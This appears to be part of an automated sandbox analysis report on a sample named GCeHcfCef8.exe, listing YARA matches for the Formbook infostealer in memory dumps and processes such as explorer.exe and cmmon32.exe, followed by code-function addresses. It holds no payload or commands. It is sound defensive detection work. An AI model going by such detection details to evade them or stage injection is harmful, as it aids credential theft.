          Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: GCeHcfCef8.exe PID: 6280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: GCeHcfCef8.exe PID: 7052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmmon32.exe PID: 5656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.GCeHcfCef8.exe.4149970.3.raw.unpack, -Module-.csLarge array initialization: _202E_202A_200D_200D_200E_202C_206D_202D_200C_200C_206E_206D_206E_202D_200E_206E_200F_200F_202E_202C_200E_206C_206F_202D_200F_200B_202A_202E_200D_206A_200E_202E_202C_200C_200E_200B_206B_202B_206A_202D_202E: array initializer size 5648
          Source: GCeHcfCef8.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: GCeHcfCef8.exe PID: 6280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: GCeHcfCef8.exe PID: 7052, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmmon32.exe PID: 5656, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_018DD55C0_2_018DD55C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0569DC880_2_0569DC88
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_05696A480_2_05696A48
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_056900400_2_05690040
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_056900060_2_05690006
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_05696A380_2_05696A38
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF35A280_2_0BF35A28
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF355980_2_0BF35598
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF34B900_2_0BF34B90
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF34B810_2_0BF34B81
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF300400_2_0BF30040
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF300060_2_0BF30006
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF345E00_2_0BF345E0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF345CF0_2_0BF345CF
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF35A170_2_0BF35A17
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF3F0880_2_0BF3F088
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 0_2_0BF355880_2_0BF35588
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041E00E2_2_0041E00E
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041E81A2_2_0041E81A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041E10A2_2_0041E10A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041E2B42_2_0041E2B4
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041DBD92_2_0041DBD9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041E4DB2_2_0041E4DB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_00402D882_2_00402D88
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0041DE782_2_0041DE78
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017781582_2_01778158
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178A1182_2_0178A118
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E01002_2_016E0100
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A81CC2_2_017A81CC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B01AA2_2_017B01AA
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A41A22_2_017A41A2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017820002_2_01782000
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AA3522_2_017AA352
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B03E62_2_017B03E6
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FE3F02_2_016FE3F0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017902742_2_01790274
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017702C02_2_017702C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F05352_2_016F0535
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017B05912_2_017B0591
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A24462_2_017A2446
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017944202_2_01794420
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179E4F62_2_0179E4F6
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F07702_2_016F0770
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017147502_2_01714750
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EC7C02_2_016EC7C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170C6E02_2_0170C6E0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017069622_2_01706962
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F29A02_2_016F29A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017BA9A62_2_017BA9A6
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F28402_2_016F2840
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FA8402_2_016FA840
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0171E8F02_2_0171E8F0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016D68B82_2_016D68B8
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AAB402_2_017AAB40
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A6BD72_2_017A6BD7
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EEA802_2_016EEA80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178CD1F2_2_0178CD1F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FAD002_2_016FAD00
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016EADE02_2_016EADE0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01708DBF2_2_01708DBF
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0C002_2_016F0C00
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E0CF22_2_016E0CF2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01790CB52_2_01790CB5
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01764F402_2_01764F40
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01710F302_2_01710F30
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01792F302_2_01792F30
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01732F282_2_01732F28
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FCFE02_2_016FCFE0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E2FC82_2_016E2FC8
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0176EFA02_2_0176EFA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F0E592_2_016F0E59
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AEE262_2_017AEE26
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AEEDB2_2_017AEEDB
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01702E902_2_01702E90
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017ACE932_2_017ACE93
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017BB16B2_2_017BB16B
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0172516C2_2_0172516C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DF1722_2_016DF172
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016FB1B02_2_016FB1B0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A70E92_2_017A70E9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AF0E02_2_017AF0E0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F70C02_2_016F70C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179F0CC2_2_0179F0CC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016DD34C2_2_016DD34C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A132D2_2_017A132D
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0173739A2_2_0173739A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017912ED2_2_017912ED
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170B2C02_2_0170B2C0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F52A02_2_016F52A0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A75712_2_017A7571
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178D5B02_2_0178D5B0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016E14602_2_016E1460
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AF43F2_2_017AF43F
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AF7B02_2_017AF7B0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A16CC2_2_017A16CC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170B9502_2_0170B950
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F99502_2_016F9950
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017859102_2_01785910
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0175D8002_2_0175D800
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F38E02_2_016F38E0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AFB762_2_017AFB76
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01765BF02_2_01765BF0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0172DBF92_2_0172DBF9
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170FB802_2_0170FB80
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01763A6C2_2_01763A6C
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AFA492_2_017AFA49
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A7A462_2_017A7A46
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0179DAC62_2_0179DAC6
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01735AA02_2_01735AA0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0178DAAC2_2_0178DAAC
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01791AA32_2_01791AA3
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A7D732_2_017A7D73
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017A1D5A2_2_017A1D5A
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F3D402_2_016F3D40
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_0170FDC02_2_0170FDC0
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_01769C322_2_01769C32
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AFCF22_2_017AFCF2
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AFF092_2_017AFF09
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_017AFFB12_2_017AFFB1
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F1F922_2_016F1F92
          Source: C:\Users\user\Desktop\GCeHcfCef8.exeCode function: 2_2_016F9EB02_2_016F9EB0
          Source: C:\Windows\explorer.exeCode function: 3_2_102CC0363_2_102CC036
          Source: C:\Windows\explorer.exeCode function: 3_2_102C30823_2_102C3082
          Source: C:\Windows\explorer.exeCode function: 3_2_102C4D023_2_102C4D02
          Source: C:\Windows\explorer.exeCode function: 3_2_102CA9123_2_102CA912
          Source: C:\Windows\explorer.exeCode function: 3_2_102D05CD3_2_102D05CD
          Source: C:\Windows\explorer.exeCode function: 3_2_102CD2323_2_102CD232
          Source: C:\Windows\explorer.exeCode function: 3_2_102C7B303_2_102C7B30
          Source: C:\Windows\explorer.exeCode function: 3_2_102C7B323_2_102C7B32
          Source: C:\Windows\explorer.exeCode function: 3_2_10E292323_2_10E29232
          Source: C:\Windows\explorer.exeCode function: 3_2_10E1F0823_2_10E1F082
          Source: C:\Windows\explorer.exeCode function: 3_2_10E280363_2_10E28036
          Source: C:\Windows\explorer.exeCode function: 3_2_10E2C5CD3_2_10E2C5CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10E23B323_2_10E23B32
          Source: C:\Windows\explorer.exeCode function: 3_2_10E23B303_2_10E23B30
          Source: C:\Windows\explorer.exeCode function: 3_2_10E20D023_2_10E20D02
          Source: C:\Windows\explorer.exeCode function: 3_2_10E269123_2_10E26912
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044624464_2_04462446
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044544204_2_04454420
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0445E4F64_2_0445E4F6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B05354_2_043B0535
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044705914_2_04470591
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043CC6E04_2_043CC6E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B07704_2_043B0770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043D47504_2_043D4750
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043AC7C04_2_043AC7C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044420004_2_04442000
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044381584_2_04438158
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043A01004_2_043A0100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0444A1184_2_0444A118
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044681CC4_2_044681CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044641A24_2_044641A2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044701AA4_2_044701AA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044502744_2_04450274
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044302C04_2_044302C0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0446A3524_2_0446A352
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_044703E64_2_044703E6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043BE3F04_2_043BE3F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043B0C004_2_043B0C00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043A0CF24_2_043A0CF2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04450CB54_2_04450CB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_043BAD004_2_043BAD00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0444CD1F4_2_0444CD1F
